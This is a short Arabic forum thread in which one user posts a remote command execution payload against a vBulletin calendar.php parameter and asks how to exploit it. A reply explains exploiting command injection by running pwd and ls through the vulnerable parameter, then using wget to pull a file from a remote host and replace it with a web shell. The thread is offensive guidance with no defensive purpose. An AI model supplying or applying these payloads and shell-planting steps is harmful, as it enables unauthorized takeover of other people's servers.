لقد وجدت هذة الثغرة و ارجو ان تفيدونى كيف استغلال هذة
xxxx.com/calender.php?calbirthdays=1&actions=getday&day=2001-8-15&
comma=%22;echo%20' ' ,%20echo%20%60id%20%60;die<>;echo%22 :
vbulletin allows remote command execution
ارجوكم

أخي الكريم
ثغرات ال cgi او هي عبارة عن ثغرة تسمح بتنفيذ أوامر اللينكس على السرفر
مثلا معك الوقع مصاب بالثغرة target.com و الإصابة هنا =file.php?id
سيكون الاستغلال هكذا لمعرفة مسارك على السرفر target.com/file.php?id=pwd
و file.php?id=ls -la لمعرفة الملفات على المجلد اللي أنت عليه الآن
و wget http://www.....com/file.zip لتنزيل الملف المطلوب على المجلد اللي أنت عليه ... استبدل الملف بالشل و عيش
---------------------
أخي هناك الكثير من الدورات القيمة في المنتدى أنصحك بها